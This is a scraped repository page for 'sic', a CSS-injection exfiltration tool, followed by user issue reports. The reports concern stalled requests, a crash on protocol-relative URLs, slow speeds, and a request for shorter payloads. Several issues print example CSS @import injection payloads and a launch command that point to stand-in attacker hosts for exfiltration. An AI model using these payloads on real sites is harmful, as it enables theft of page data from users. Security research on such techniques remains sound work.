d0nutptr / sic Goto Github PK
View Code? Open in Web Editor NEWA tool to perform Sequential Import Chaining
Home Page: https://medium.com/@d0nut/better-exfiltration-via-html-injection-31c72a2dae8b
License: MIT License
A tool to perform Sequential Import Chaining
Home Page: https://medium.com/@d0nut/better-exfiltration-via-html-injection-31c72a2dae8b
License: MIT License
I tried exfiltrating <meta>
tag and it gets stuck - it makes 2 requests and then all other requests are set to pending. I have to click on meta in source code to continue exfiltrating.
After doing this and clicking on request it says Stalled - clicking on Explaination I found out that it's queueing the requests for some of these reasons:
Is there any way this can be fixed or bypassed?
Hi,
First, great article + finding + tool ๐
I try to reuse it years later with different browser (firefox, chrome). I did not succeed to make it works.
As I struggle a bit in rust I have not been able to modify the code to my wish (I wrote my own "clone" of your idea in go. it works with a bot but with my browsers not)
So my question is simple, do you know if the trick always works ? If yes on which browser?
Thank in advance
Hey d0nut,
In testing the use of Nginx to terminate HTTPs connections for sic I receive the following error:
thread 'tokio-runtime-worker-0' panicked at 'called `Result::unwrap()` on an `Err` value: RelativeUrlWithoutBase', src/libcore/result.rs:999:5
This happens when supplying a Protocol Relative URL as the Polling or Callback host like this:
./sic -p 3000 --ph "//a.pwnu.net" --ch "//b.pwnu.net" -t template_file
Using Protocol Relative URLs would allow sic payloads to work on both HTTP and HTTPs pages simultaneously.
BTW - Here's the example Nginx config I promised you.
Best,
NBK
Hey d0nut,
So I thought it was the proxy that was introducing latency, but actually even directly connected to the internet, my speeds are nowhere near the ones in your demo video. It's taking about 2 minutes to discover 5-7 characters.
Before I start doing packet capture/analysis I wanted to make sure that you haven't run into this problem before. I'm testing w/ Chrome and FF on Win 10, sic is running on an Ubuntu VPS w/out firewall. Did you have any special TCP settings on the client or server?
Also, lack of a Content-Type
header is causing IE to not evaluate the CSS.
Also, also, I see mention of an environmental variable for debugging. How is that used?
Thanks
Hey d0nut, here's another enhancement request.
Since we're specifying charset
on the command line, why not also allow specifying a default staging len
value. This way if no path is specified, a targeted payload could still be delivered.
For example if we could only inject (assuming protocol relative url support):
@import url(//attacker.com)
Then a payload could be generated using whatever len
argument was specified via the command line (a sensible default, like 12 could be assumed if none is provided via URL or CLI).
This would have the advantage of limiting the characters required for successful injection to only ().a-z/
. This could be reduced further to just ()0-9/
using dotless IP to just:
@import url(//16843009)
Wouldn't that be cool?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.